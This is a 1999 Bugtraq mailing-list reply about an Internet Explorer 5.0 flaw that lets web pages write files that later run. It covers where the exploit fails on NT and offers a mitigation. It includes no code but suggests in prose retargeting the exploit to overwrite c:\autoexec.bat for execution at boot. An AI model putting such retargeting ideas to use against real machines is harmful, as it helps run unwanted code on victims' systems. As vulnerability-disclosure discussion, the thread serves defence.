Bugtraq mailing list archives

Re: IE 5.0 allows executing programs

From: Eric.Stevens () RP-RORER COM (STEVENS, Eric)
Date: Mon, 23 Aug 1999 07:42:04 -0400

This would probably work on NT machines if in the code the path referenced
pointed at the startup directory of an existing NT profile.  Unfortunately
it's impossible to guess the username of the currently logged on user, and
if you go with something "safe" (i.e. relatively likely to exist) like the
AllUsers profile, you should get blocked from doing that if permissions are
set right on NTFS (if the WINSYS drive is NTFS).  I get a JavaScript error
when I tried Georgi's code since the path "C:\Windows\Start
Menu\Programs\Startup\" does not exist.  Also this is weakened if in 95/98
the user does not use the same profile for all users logged on to the
network.  Although it does still write the file in a dangerous place, since
it will be executed or whatever if the default user profile logs on.

This only reaffirms my opinion that anyone who wishes to do something simple
when setting up a machine the first time to greatly protect themselves,
should simply change the name of their windows directory.

Also, I don't know fully how peravsive this exploit is, but if it is capable
of creating .bat filess, interresting things may be thought to happen if
instead of the path written in the exploit, one were to instead overwrite
c:\autoexec.bat.  C:\ is a pretty safe path to guess.

___ /--+   _____ eric.stevens () rp-rorer com _____ \ ___
__ /      ____ rpr graphics asp design team _____ \ __
_ `----+ x-eric-conspiracy: there is no conspiracy + _